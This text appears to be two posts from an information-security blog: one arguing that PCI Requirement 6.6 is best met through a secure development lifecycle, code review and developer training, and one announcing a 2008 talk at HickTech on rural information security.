There needs to be a balance found with Requirement 6.6 to include source code review, using a web application vulnerability scanner as a tool, and a WAP for it to be taken seriously. There are ways to do this. If an organization implements a solid SDL process, you only need to do sample source code review during the development phase, since a lot of the initial threats were identified during the threat analysis phase. Also, you have secure coding practices and modules that already address a lot of issues such as poor input validation etc. If one is looking to spend less time on finding security issues after a production / environment has to be deployed, one has to look at security right from the start. This holds true when you are building out a security network or DMZ, and also holds true when it comes to the design and development of an application.

The bottom line is that the clarification does not really help out overall.

PCI or not, a proper SDLC implementation and process, developers going through secure code training, and having a proper set of tools will lead to a more secure application.


Speaking at HickTech

April 29, 2008

I’m always interested in finding new ways that people are looking at risk and information security. To that end, I’m making the trip today up to Owne Sound, ON to participate in HickTech. I was supposed to be a part of it last year, but missed out due to a scheduling conflict.

This year, I’m excited to talk to a whole bunch of people about the way that business and government in rural areas are dealing with information security and risk management. While I’m going there to speak, I hope to learn a great deal, as well.

And, with a schedule like this one, how could I not? Topics like “Agri-Food Traceability” and the challenges of deploying broadband to rural environments are definitely new to me.